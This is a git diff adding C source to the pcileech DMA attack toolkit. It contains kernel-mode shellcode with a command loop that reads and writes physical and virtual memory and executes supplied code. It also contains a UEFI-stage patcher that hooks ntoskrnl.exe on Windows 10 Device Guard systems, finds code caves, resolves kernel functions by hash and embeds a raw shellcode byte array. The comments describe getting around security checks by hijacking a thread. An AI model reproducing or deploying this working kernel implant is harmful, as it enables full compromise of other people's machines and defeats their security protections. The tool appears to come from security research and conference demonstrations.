+// ----------------------------- SHELLCODE FUNCTIONS BELOW (STAGE2) -----------------------------
+
+DWORD HashROR13A(_In_ LPCSTR sz)
+{
+	DWORD dwVal, dwHash = 0;
+	while(*sz) {
+		dwVal = (DWORD)*sz++;
+		dwHash = (dwHash >> 13) | (dwHash << 19);
+		dwHash += dwVal;
+	}
+	return dwHash;
+}
+
+/*
+* Lookup a function and return it, if found.
+* -- hModule
+* -- dwProcNameH
+* -- return
+*/
+QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
+{
+	PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+	PWORD pwNameOrdinals;
+	DWORD i, dwFnIdx, dwHash;
+	LPSTR sz;
+	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+	PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule);
+	pdwRVAAddrNames = (PDWORD)(hModule + exp->AddressOfNames);
+	pwNameOrdinals = (PWORD)(hModule + exp->AddressOfNameOrdinals);
+	pdwRVAAddrFunctions = (PDWORD)(hModule + exp->AddressOfFunctions);
+	for(i = 0; i < exp->NumberOfNames; i++) {
+		sz = (LPSTR)(hModule + pdwRVAAddrNames[i]);
+		dwHash = HashROR13A(sz);
+		if(dwHash == dwProcNameH) {
+			dwFnIdx = pwNameOrdinals[i];
+			if(dwFnIdx >= exp->NumberOfFunctions) { return 0; }
+			return hModule + pdwRVAAddrFunctions[dwFnIdx];
+		}
+	}
+	return 0;
+}
+
+#define KMD_CMD_VOID			0xffff
+#define KMD_CMD_COMPLETED		0
+#define KMD_CMD_READ			1
+#define KMD_CMD_WRITE			2
+#define KMD_CMD_TERMINATE		3
+#define KMD_CMD_MEM_INFO		4
+#define KMD_CMD_EXEC		    5
+#define KMD_CMD_READ_VA			6
+#define KMD_CMD_WRITE_VA		7
+#define KMD_CMD_EXEC_EXTENDED	8
+
+// status:
+//     1: ready for command
+//     2: processing
+//     f0000000: terminated
+//     f0000000+: error
+// op: - see KMD_CMD defines
+// result:
+//    0: FALSE
+//    1: TRUE
+// address:
+//    physical base address for memory operation
+// size:
+//    size of memory operation
+VOID stage3_c_MainCommandLoop(PKMDDATA pk)
+{
+	LONGLONG llTimeToWait = -10000; // 1000 uS (negative multiples of 100ns)
+	PVOID pvBufferOutDMA;
+	PPHYSICAL_MEMORY_RANGE pMemMap;
+	PVOID pvMM = NULL;
+	QWORD i, idleCount = 0;
+	// 1: set up mem out dma area 16MB//4MB in lower 4GB
+	pk->DMASizeBuffer = 0x1000000;
+	pvBufferOutDMA = pk->fn.MmAllocateContiguousMemory(0x01000000, 0xffffffff);
+	if(!pvBufferOutDMA) {
+		pk->DMASizeBuffer = 0x00400000;
+		pvBufferOutDMA = pk->fn.MmAllocateContiguousMemory(0x00400000, 0xffffffff);
+	}
+	if(!pvBufferOutDMA) {
+		pk->DMASizeBuffer = 0;
+		pk->_status = 0xf0000001;
+		return;
+	}
+	pk->DMAAddrVirtual = (QWORD)pvBufferOutDMA;
+	pk->DMAAddrPhysical = pk->fn.MmGetPhysicalAddress(pvBufferOutDMA);
+	// 2: main dump loop
+	while(TRUE) {
+		pk->_status = 1;
+		if(KMD_CMD_COMPLETED == pk->_op) { // NOP
+			idleCount++;
+			// thread wait after X number of idle loops - TODO: change to timing
+			if(idleCount > 10000000000) {
+				pk->fn.KeDelayExecutionThread(KernelMode, FALSE, &llTimeToWait);
+			}
+			continue;
+		}
+		pk->_status = 2;
+		if(KMD_CMD_TERMINATE == pk->_op) { // EXIT
+			pk->_status = 0xf0000000;
+			pk->fn.MmFreeContiguousMemory(pvBufferOutDMA);
+			pk->DMAAddrPhysical = 0;
+			pk->DMAAddrVirtual = 0;
+			pk->_result = TRUE;
+			pk->MAGIC = 0;
+			pk->_op = KMD_CMD_COMPLETED;
+			return;
+		}
+		if(KMD_CMD_MEM_INFO == pk->_op) { // INFO (physical section map)
+			pMemMap = pk->fn.MmGetPhysicalMemoryRanges();
+			if(pMemMap == NULL) {
+				pk->_result = FALSE;
+			} else {
+				for(i = 0; (pMemMap[i].BaseAddress) || (pMemMap[i].NumberOfBytes.QuadPart); i++);
+				pk->_size = i * sizeof(PHYSICAL_MEMORY_RANGE);
+				pk->fn.RtlCopyMemory(pvBufferOutDMA, pMemMap, pk->_size);
+				pk->fn.ExFreePool(pMemMap);
+				pk->_result = TRUE;
+			}
+		}
+		if(KMD_CMD_EXEC == pk->_op) { // EXEC at start of buffer
+			if(pk->dataIn[9]) {
+				// PSCMD_KERNEL
+				((VOID(*)(PKMDDATA))pk->ReservedKMD[1])(pk);
+				pk->_result = TRUE;
+			} else {
+				// VFS
+				((VOID(*)(PKMDDATA))pk->ReservedKMD[0])(pk);
+				pk->_result = TRUE;
+			}
+		}
+		if(KMD_CMD_READ == pk->_op || KMD_CMD_WRITE == pk->_op) { // PHYSICAL MEMORY READ/WRITE
+			if(pk->dataIn[9] == 0) {
+				pvMM = NULL; // no memory read if vfs (might crash the system accidentally)
+			} else {
+				pvMM = pk->fn.MmMapIoSpace(pk->_address, pk->_size, 0);
+			}
+			if(pvMM) {
+				if(KMD_CMD_READ == pk->_op) { // READ
+					pk->fn.RtlCopyMemory(pvBufferOutDMA, pvMM, pk->_size);
+				} else { // WRITE
+					pk->fn.RtlCopyMemory(pvMM, pvBufferOutDMA, pk->_size);
+				}
+				pk->fn.MmUnmapIoSpace(pvMM, pk->_size);
+				pk->_result = TRUE;
+			} else {
+				pk->_result = FALSE;
+			}
+		}
+		if(KMD_CMD_READ_VA == pk->_op) { // READ Virtual Address
+			pk->fn.RtlCopyMemory(pvBufferOutDMA, (PVOID)pk->_address, pk->_size);
+			pk->_result = TRUE;
+		}
+		if(KMD_CMD_WRITE_VA == pk->_op) { // WRITE Virtual Address
+			pk->fn.RtlCopyMemory((PVOID)pk->_address, pvBufferOutDMA, pk->_size);
+			pk->_result = TRUE;
+		}
+		pk->_op = KMD_CMD_COMPLETED;
+		idleCount = 0;
+	}
+}
+
+#define DATA_OFFSET_TRIGGER_COUNT	0x02
+#define DATA_OFFSET_KMD_THIS		0x08
+#define DATA_OFFSET_VFS				0x0c
+#define DATA_OFFSET_PSCMD_KERNEL	0x10
+#define DATA_OFFSET_PSCMD_USER		0x14
+VOID c_EntryPoint_Thread(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase)
+{
+	PVOID(*MmMapIoSpace)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE);
+	VOID(*MmUnmapIoSpace)(PVOID, SIZE_T);
+	PVOID(*MmAllocateContiguousMemory)(SIZE_T, PHYSICAL_ADDRESS);
+	PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(PVOID);
+	VOID(*RtlZeroMemory)(PVOID, SIZE_T);
+	PVOID pvKMD, pvPA1000;
+	PKMDDATA pk;
+	DWORD i = 0, NAMES[32];
+	QWORD vaAddrZero;
+	MmMapIoSpace = (PVOID(*)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE))PEGetProcAddressH(qwAddrNtosBase, H_MmMapIoSpace);
+	MmUnmapIoSpace = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_MmUnmapIoSpace);
+	MmAllocateContiguousMemory = (PVOID(*)(SIZE_T, PHYSICAL_ADDRESS))PEGetProcAddressH(qwAddrNtosBase, H_MmAllocateContiguousMemory);
+	MmGetPhysicalAddress = (PHYSICAL_ADDRESS(*)(PVOID))PEGetProcAddressH(qwAddrNtosBase, H_MmGetPhysicalAddress);
+	RtlZeroMemory = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_RtlZeroMemory);
+	pvKMD = MmMapIoSpace(0x3000, 0x1000, 0);
+	if(!pvKMD) { return; }
+	RtlZeroMemory(pvKMD, 0x1000);
+	pk = (PKMDDATA)pvKMD;
+	pk->AddrKernelBase = qwAddrNtosBase;
+	pk->MAGIC = 0x0ff11337711333377;
+	pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_WINDOWS;
+	vaAddrZero = qwAddrKmdBase - *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_KMD_THIS);
+	pk->ReservedKMD[0] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_VFS);
+	pk->ReservedKMD[1] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_PSCMD_KERNEL);
+	pk->ReservedKMD[2] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_PSCMD_USER);
+	NAMES[i++] = H_ExFreePool;
+	NAMES[i++] = H_MmFreeContiguousMemory;
+	NAMES[i++] = H_MmAllocateContiguousMemory;
+	NAMES[i++] = H_MmGetPhysicalAddress;
+	NAMES[i++] = H_MmGetPhysicalMemoryRanges;
+	NAMES[i++] = H_MmMapIoSpace;
+	NAMES[i++] = H_MmUnmapIoSpace;
+	NAMES[i++] = H_PsCreateSystemThread;
+	NAMES[i++] = H_RtlCopyMemory;
+	NAMES[i++] = H_ZwProtectVirtualMemory;
+	NAMES[i++] = H_KeDelayExecutionThread;
+	while(i) {
+		i--;
+		*((PQWORD)&pk->fn + i) = PEGetProcAddressH(pk->AddrKernelBase, NAMES[i]);
+	}
+	pvPA1000 = MmMapIoSpace(0x1000, 0x1000, 0);
+	*(PQWORD)((QWORD)pvPA1000 + 0xc0) = MmGetPhysicalAddress(pvKMD);
+	*(PQWORD)((QWORD)pvPA1000 + 0xb0) = KMDDATA_MAGIC;
+	MmUnmapIoSpace(pvPA1000, 0x1000);
+	stage3_c_MainCommandLoop(pk);
+}
+
+VOID c_EntryPoint(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase, QWORD qwCR3)
+{
+	PVOID(*MmMapIoSpace)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE);
+	VOID(*MmUnmapIoSpace)(PVOID, SIZE_T);
+	PVOID pvPA1000;
+	QWORD count;
+	WORD cTrigger;
+	MmMapIoSpace = (PVOID(*)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE))PEGetProcAddressH(qwAddrNtosBase, H_MmMapIoSpace);
+	MmUnmapIoSpace = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_MmUnmapIoSpace);
+	pvPA1000 = MmMapIoSpace(0x1000, 0x1000, 0);
+	if(!pvPA1000) { return; }
+	if((*(PQWORD)((QWORD)pvPA1000 + 0xa0) == qwCR3)) {
+		cTrigger = *(PWORD)(qwAddrKmdBase + DATA_OFFSET_TRIGGER_COUNT);
+		count = *(PQWORD)((QWORD)pvPA1000 + 0xb8) = *(PQWORD)((QWORD)pvPA1000 + 0xb8) + 1;
+		if(count == cTrigger) {
+			MmUnmapIoSpace(pvPA1000, 0x1000);
+			//INFO: it seems like we cannot create system thread due to security checks
+			//PsCreateSystemThread = (NTSTATUS(*)(PHANDLE, ULONG, POBJECT_ATTRIBUTES, HANDLE, PCLIENT_ID, PKSTART_ROUTINE, PVOID))PEGetProcAddressH(qwAddrNtosBase, H_PsCreateSystemThread);
+			//PsCreateSystemThread(&hThread, 0x1ffff, NULL, NULL, NULL, (PKSTART_ROUTINE)c_EntryPoint_Thread, (PVOID)qwAddrNtosBase);
+			//INFO: hijack is fine with 'security' though =P			
+			c_EntryPoint_Thread(qwAddrNtosBase, qwAddrKmdBase);
+			return;
+		}
+	}
+	MmUnmapIoSpace(pvPA1000, 0x1000);
+}
diff --git a/pcileech_shellcode/uefi_winload_ntos_patch.c b/pcileech_shellcode/uefi_winload_ntos_patch.c
new file mode 100644
index 0000000..5892ca7
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_patch.c
@@ -0,0 +1,949 @@
+// uefi_winload_ntos_patch.c : hooks/patches ntoskrnl.exe!PsCreateSystemThreadEx with evil code.
+// evil code consists of:
+// - custom kernel module
+// - mount (vfs) payload (use with 'pcileech mount')
+// - pscmd payload (use with 'pcileech wx64_pscmd -9 1')
+//
+// (planned to be used in demo at 34c3)
+//
+// (c) Ulf Frisk, 2017
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+// compile with:
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_patch.c
+// ml64.exe uefi_common_a.asm /Feuefi_winload_ntos_patch.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_patch.obj uefi_common.obj
+// shellcode64.exe -o uefi_winload_ntos_patch.exe "UEFI WINLOAD NTOSKRNL.EXE PATCHER FOR DEVICE GUARD SYSTEMS\n===========================================================\nPatches ntoskrnl.exe!PsCreateSystemThread with executable set separately with\nthe in parameter. Must be run from ExitBootServices. Targets Windows 10 with\nDevice Guard only! Good value for num_threads_skip is 0x50.\nSyntax: pcileech.exe uefi_winload_ntos_patch -in <patchfile> -0 <num_threads_skip>\nGENERAL INFORMATION BELOW:%s\n  Status           : %016llx\n  NTOSKRNL.EXE     : %016llx\n  Hooked Function  : %016llx\n  Code Cave VFS    : %016llx\n  Code Cave KMD    : %016llx\n  Code Cave CMD #1 : %016llx\n  Code Cave CMD #2 : %016llx\n"
+//
+#include "uefi_common.h"
+
+// ----------------------------------------------------------------------------
+// UTILITY FUNCTIONS BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* Calculate a ROR13 hash given an ANSI string.
+* -- sz
+* -- return
+*/
+DWORD HashROR13A(LPSTR sz)
+{
+	DWORD dwVal, dwHash = 0;
+	while(*sz) {
+		dwVal = (DWORD)*sz++;
+		dwHash = (dwHash >> 13) | (dwHash << 19);
+		dwHash += dwVal;
+	}
+	return dwHash;
+}
+
+/*
+* Lookup address of function given a module base address and a ROR13 hash.
+* -- hModule = base address of PE to look for function in.
+* -- dwProcNameH = ROR13 hash of function name to lookup.
+* -- return = address of function, 0 = fail.
+*/
+QWORD PEGetProcAddressH(QWORD hModule, DWORD dwProcNameH)
+{
+	PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+	PWORD pwNameOrdinals;
+	DWORD i, dwFnIdx, dwHash;
+	LPSTR sz;
+	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+	if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return 0; }
+	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+	if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return 0; }
+	PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule);
+	if(!exp || !exp->NumberOfNames || !exp->AddressOfNames) { return 0; }
+	pdwRVAAddrNames = (PDWORD)(hModule + exp->AddressOfNames);
+	pwNameOrdinals = (PWORD)(hModule + exp->AddressOfNameOrdinals);
+	pdwRVAAddrFunctions = (PDWORD)(hModule + exp->AddressOfFunctions);
+	for(i = 0; i < exp->NumberOfNames; i++) {
+		sz = (LPSTR)(hModule + pdwRVAAddrNames[i]);
+		dwHash = HashROR13A(sz);
+		if(dwHash == dwProcNameH) {
+			dwFnIdx = pwNameOrdinals[i];
+			if(dwFnIdx >= exp->NumberOfFunctions) { return 0; }
+			return (QWORD)(hModule + pdwRVAAddrFunctions[dwFnIdx]);
+		}
+	}
+	return 0;
+}
+
+BOOL PEGetSection(QWORD hModule, QWORD qwSzSection, PDWORD pdwSectionBaseRel, PDWORD pdwSectionSize)
+{
+	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+	if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return FALSE; }
+	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+	if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return FALSE; }
+	int nSections = ntHeader->FileHeader.NumberOfSections;
+	for(int i = 0; i < nSections; i++) {
+		PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)(hModule + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS64) + i * sizeof(IMAGE_SECTION_HEADER));
+		if(*(PQWORD)sectionHeader->Name == qwSzSection) {
+			*pdwSectionBaseRel = sectionHeader->VirtualAddress;
+			*pdwSectionSize = sectionHeader->Misc.VirtualSize;
+			return TRUE;
+		}
+	}
+	return FALSE;
+}
+
+// ----------------------------------------------------------------------------
+// "SPECIALIZED" UTILITY FUNCTIONS BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* When ExitBootServices() is called by winload.efi ntoskrnl.exe (and hvix.exe)
+* are already loaded and integrity checked by winload. The location of ntoskrnl
+* is randomized in memory, but is usually found between address: 0x01000000 and
+* 0x04000000.
+* -- return = base address of ntoskrnl.exe, 0 if fail.
+*/
+QWORD FindNtoskrnl()
+{
+	QWORD qwA, o;
+	BOOL fINITKDBG, fPOOLCODE;
+	for(qwA = 0x01000000; qwA < 0x04000000; qwA += 0x1000) {
+		if(*(PWORD)qwA == 0x5a4d) { // MZ header
+			fINITKDBG = FALSE;
+			fPOOLCODE = FALSE;
+			for(o = 0; o < 0x1000; o += 8) {
+				if(*(PQWORD)(qwA + o) == 0x4742444B54494E49) { // INITKDBG
+					fINITKDBG = TRUE;
+				}
+				if(*(PQWORD)(qwA + o) == 0x45444F434C4F4F50) { // POOLCODE
+					fPOOLCODE = TRUE;
+				}
+				if(fINITKDBG && fPOOLCODE) {
+					return qwA;
+				}
+			}
+		}
+	}
+	return 0;
+}
+
+/*
+* Locate a "code cave" - a place (in an executable section) consisting of zeros
+* in which we can put our main executable payload. Function searches forward
+* given a base address to find such a region of max qwSize bytes. Function is
+* dumb and in rare cases code cave returned might be in NX section.
+* -- hModule = base address to start searching from.
+* -- qwSize = size of code cave to locate; max 0x1000 and even QWORD required.
+* -- return = address of located code cave, 0 if fail.
+*/
+QWORD FindCodeCave(QWORD hModule, QWORD qwSize)
+{
+	QWORD STR_SECTIONS_ALLOWED[] = {
+		0x000000747865742e,	// .text
+		0x0000000045474150,	// PAGE
+		0x45444f434c4f4f50,	// POOLCODE
+		0x00004b4c45474150,	// PAGELK
+		0x0000444b45474150,	// PAGEKD
+		0x534c444845474150	// PAGEHDLS
+	};
+	DWORD i, dwSectionBaseRel, dwSectionSize;
+	QWORD qwACC;
+	for(i = 0; i < sizeof(STR_SECTIONS_ALLOWED) / sizeof(QWORD); i++) {
+		if(!PEGetSection(hModule, STR_SECTIONS_ALLOWED[i], &dwSectionBaseRel, &dwSectionSize)) { continue; } // section not found
+		if(qwSize > (0x1000 - (dwSectionSize & 0xfff))) { continue; } // code cave too small
+		qwACC = hModule + dwSectionBaseRel + dwSectionSize;
+		if(*(PQWORD)qwACC) { continue; } // not empty - code cave probably already taken ...
+		return qwACC;
+	}
+	return 0;
+}
+
+// ----------------------------------------------------------------------------
+// SHELLCODE MODULES (COMPILED SEPARATELY) BELOW:
+// ----------------------------------------------------------------------------
+
+// specially compiled kernel module payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_kmd_c.c
+// ml64.exe uefi_winload_ntos_kmd.asm /Feuefi_winload_ntos_kmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_kmd_c.obj
+// shellcode64.exe -o uefi_winload_ntos_kmd.exe
+// xxd -i uefi_winload_ntos_kmd.bin
+VOID GetData_KMD(PBYTE *ppb, PDWORD pcb)
+{
+	BYTE WINX64_KMD_BIN[] = {
+		0xeb, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+		0x50, 0x44, 0x0f, 0x20, 0xc0, 0x84, 0xc0, 0x75, 0x6a, 0x53, 0x51, 0x52,
+		0x57, 0x56, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41, 0x54,
+		0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0x48, 0x8d, 0x0d, 0xc2, 0xff,
+		0xff, 0xff, 0x8b, 0x05, 0xc4, 0xff, 0xff, 0xff, 0x48, 0x2b, 0xc8, 0x8b,
+		0x05, 0xb7, 0xff, 0xff, 0xff, 0x48, 0x03, 0xc8, 0x48, 0x8d, 0x15, 0xa9,
+		0xff, 0xff, 0xff, 0x41, 0x0f, 0x20, 0xd8, 0x4c, 0x8b, 0xfc, 0x48, 0x81,
+		0xec, 0x00, 0x01, 0x00, 0x00, 0x48, 0xc1, 0xec, 0x04, 0x48, 0xc1, 0xe4,
+		0x04, 0xe8, 0xba, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xe7, 0x5d, 0x41, 0x5f,
+		0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59,
+		0x41, 0x58, 0x5e, 0x5f, 0x5a, 0x59, 0x5b, 0x58, 0xc3, 0xcc, 0xcc, 0xcc,
+		0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+		0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x48, 0x63, 0x41, 0x3c, 0x8b,
+		0xea, 0x33, 0xd2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00, 0x4c,
+		0x03, 0xc1, 0x45, 0x8b, 0x50, 0x20, 0x41, 0x8b, 0x78, 0x24, 0x4c, 0x03,
+		0xd1, 0x41, 0x8b, 0x58, 0x1c, 0x48, 0x03, 0xf9, 0x41, 0x8b, 0x70, 0x18,
+		0x48, 0x03, 0xd9, 0x85, 0xf6, 0x74, 0x2e, 0x45, 0x8b, 0x0a, 0x4c, 0x03,
+		0xc9, 0x45, 0x33, 0xdb, 0xeb, 0x0d, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc1,
+		0x41, 0xc1, 0xcb, 0x0d, 0x44, 0x03, 0xd8, 0x41, 0x8a, 0x01, 0x84, 0xc0,
+		0x75, 0xec, 0x44, 0x3b, 0xdd, 0x74, 0x21, 0xff, 0xc2, 0x49, 0x83, 0xc2,
+		0x04, 0x3b, 0xd6, 0x72, 0xd2, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08,
+		0x48, 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b,
+		0x7c, 0x24, 0x20, 0xc3, 0x0f, 0xb7, 0x14, 0x57, 0x41, 0x3b, 0x50, 0x14,
+		0x73, 0xdf, 0x8b, 0x04, 0x93, 0x48, 0x03, 0xc1, 0xeb, 0xd9, 0xcc, 0xcc,
+		0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
+		0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
+		0x48, 0x8b, 0xf2, 0x4d, 0x8b, 0xf0, 0xba, 0xf9, 0xbe, 0xdd, 0x05, 0x48,
+		0x8b, 0xe9, 0xe8, 0x39, 0xff, 0xff, 0xff, 0xba, 0xc9, 0xc5, 0x6e, 0x6c,
+		0x48, 0x8b, 0xcd, 0x48, 0x8b, 0xd8, 0xe8, 0x29, 0xff, 0xff, 0xff, 0x41,
+		0xbf, 0x00, 0x10, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8b, 0xd7, 0x41,
+		0x8b, 0xcf, 0x48, 0x8b, 0xf8, 0xff, 0xd3, 0x48, 0x85, 0xc0, 0x74, 0x3a,
+		0x4c, 0x39, 0xb0, 0xa0, 0x00, 0x00, 0x00, 0x75, 0x29, 0x0f, 0xb7, 0x4e,
+		0x02, 0x48, 0xff, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x39, 0x88, 0xb8,
+		0x00, 0x00, 0x00, 0x75, 0x15, 0x41, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xff,
+		0xd7, 0x48, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xe8, 0x24, 0x00, 0x00, 0x00,
+		0xeb, 0x08, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xff, 0xd7, 0x48, 0x8b,
+		0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24, 0x48, 0x48, 0x8b, 0x74, 0x24,
+		0x50, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
+		0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48,
+		0x89, 0x78, 0x18, 0x55, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
+		0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00, 0x00, 0x48,
+		0x8b, 0xda, 0x48, 0x8b, 0xf1, 0xba, 0xf9, 0xbe, 0xdd, 0x05, 0xe8, 0x89,
+		0xfe, 0xff, 0xff, 0xba, 0xc9, 0xc5, 0x6e, 0x6c, 0x48, 0x8b, 0xce, 0x4c,
+		0x8b, 0xf8, 0xe8, 0x79, 0xfe, 0xff, 0xff, 0xba, 0x57, 0x63, 0x32, 0x5a,
+		0x48, 0x8b, 0xce, 0x4c, 0x8b, 0xe0, 0xe8, 0x69, 0xfe, 0xff, 0xff, 0xba,
+		0xdb, 0x4f, 0x3d, 0xc5, 0x48, 0x8b, 0xce, 0x4c, 0x8b, 0xe8, 0xe8, 0x59,
+		0xfe, 0xff, 0xff, 0x45, 0x33, 0xc0, 0xba, 0x00, 0x10, 0x00, 0x00, 0xb9,
+		0x00, 0x30, 0x00, 0x00, 0x4c, 0x8b, 0xf0, 0x41, 0xff, 0xd7, 0x48, 0x8b,
+		0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x03, 0x01, 0x00, 0x00, 0xba, 0x00,
+		0x10, 0x00, 0x00, 0x48, 0x8b, 0xc8, 0x41, 0xff, 0xd6, 0x48, 0x89, 0x77,
+		0x08, 0x4c, 0x8d, 0xb7, 0x58, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x47, 0x50,
+		0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x75, 0xe3, 0x48, 0xb8, 0x77, 0x33,
+		0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0xc7, 0x45, 0xb7, 0x1f, 0x9d, 0x48,
+		0x9d, 0x48, 0x89, 0x07, 0x48, 0x8b, 0xd3, 0x8b, 0x4b, 0x08, 0x8b, 0x43,
+		0x0c, 0x48, 0x2b, 0xd1, 0x48, 0x03, 0xc2, 0xc7, 0x45, 0xbb, 0x92, 0xf5,
+		0x45, 0x13, 0x48, 0x89, 0x47, 0x58, 0x8b, 0x43, 0x10, 0x48, 0x03, 0xc2,
+		0xc7, 0x45, 0xbf, 0xbc, 0x1e, 0x36, 0x9f, 0x48, 0x89, 0x47, 0x60, 0x8b,
+		0x43, 0x14, 0xbb, 0x0b, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc2, 0xc7, 0x45,
+		0xc3, 0x57, 0x63, 0x32, 0x5a, 0x48, 0x89, 0x47, 0x68, 0xc7, 0x45, 0xc7,
+		0x6f, 0xa5, 0x77, 0x49, 0xc7, 0x45, 0xcb, 0xf9, 0xbe, 0xdd, 0x05, 0xc7,
+		0x45, 0xcf, 0xc9, 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0xd3, 0x02, 0x6b, 0xa0,
+		0x94, 0xc7, 0x45, 0xd7, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0xdb, 0x89,
+		0x4d, 0x3f, 0xbc, 0xc7, 0x45, 0xdf, 0x92, 0x6d, 0x58, 0x58, 0x48, 0x8b,
+		0x4f, 0x08, 0x48, 0x8d, 0x76, 0xfc, 0x8b, 0x16, 0x4d, 0x8d, 0x76, 0xf8,
+		0xe8, 0x7f, 0xfd, 0xff, 0xff, 0x49, 0x89, 0x06, 0x83, 0xc3, 0xff, 0x75,
+		0xe5, 0xbe, 0x00, 0x10, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x8b, 0xd6, 0x8b,
+		0xce, 0x41, 0xff, 0xd7, 0x48, 0x8b, 0xcf, 0x48, 0x8b, 0xd8, 0x41, 0xff,
+		0xd5, 0x48, 0x89, 0x83, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xd6, 0x48, 0xb8,
+		0x77, 0x33, 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0x48, 0x8b, 0xcb, 0x48,
+		0x89, 0x83, 0xb0, 0x00, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xcf,
